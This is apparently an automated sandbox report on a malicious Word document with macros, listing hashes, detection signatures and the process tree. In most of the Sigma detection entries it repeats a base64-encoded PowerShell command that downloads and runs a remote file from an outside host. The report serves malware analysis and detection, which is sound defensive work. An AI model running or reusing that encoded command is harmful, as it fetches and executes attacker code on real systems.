Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DUD6CqQ1Uj.doc

Overview

General Information

Sample name:DUD6CqQ1Uj.doc
renamed because original name is a hash value
Original sample name:9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb.doc
Analysis ID:1584650
MD5:4fd8d5da5cd2109c730052735c9ccbb6
SHA1:2d175610936cdfc27380c13d89f5883db532d2b2
SHA256:9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb
Tags:docuser-zhuzhu0009
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Contains long sleeps (>= 3 min)
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w11x64_office
  • WINWORD.EXE (PID: 7328 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
    • powershell.exe (PID: 7996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"" MD5: 9D8E30DAF21108092D5980C931876B7E)
      • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7996JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7996.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7328, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 7996, ProcessName: powershell.exe
      Sigma detected: Suspicious Encoded PowerShell Command Line
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7328, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 7996, ProcessName: powershell.exe
      Sigma detected: Suspicious Microsoft Office Child Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7328, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 7996, ProcessName: powershell.exe
      Sigma detected: Suspicious PowerShell Encoded Command Patterns
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7328, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 7996, ProcessName: powershell.exe
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7328, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 7996, ProcessName: powershell.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7328, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 7996, ProcessName: powershell.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
